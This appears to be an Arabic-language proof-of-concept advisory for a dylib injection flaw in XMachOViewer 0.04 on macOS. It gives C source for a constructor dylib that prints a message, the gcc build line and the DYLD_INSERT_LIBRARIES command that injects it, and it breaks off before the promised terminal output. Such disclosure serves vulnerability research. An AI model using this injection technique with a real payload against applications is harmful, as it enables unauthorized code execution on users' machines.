
استغلال إثبات المفهوم لثغرة حقن dylib في XMachOViewer 0.04، يوضح تنفيذ كود غير مصرح به عبر DYLD_INSERT_LIBRARIES على macOS.
ثغرة حقن مكتبة ديناميكية (dylib) في XMachOViewer 0.04 تسمح للمهاجمين بالمساس بالسلامة. من خلال استغلالها، يمكن حقن تعليمات برمجية غير مصرح بها في عمليات المنتج، مما قد يؤدي إلى تحكم عن بُعد ووصول غير مصرح به إلى بيانات المستخدم الحساسة.

نسخة محمولة لنظام macOS
#include <syslog.h>
#include <stdio.h>
__attribute__((constructor))
static void poc(void)
{
printf("Malicious Dylib Inserted");
}
الترجمة
gcc -dynamiclib -arch x86_64 -o poc.dylib poc.c
ثم قم بحقنه:
DYLD_INSERT_LIBRARIES=poc.dylib /Applications/XMachOViewer.app/Contents/MacOS/XMachOViewer
سيؤدي هذا إلى فتح التطبيق وتشغيل dylib. بعد إغلاق التطبيق، سنرى ذلك في الطرفية:
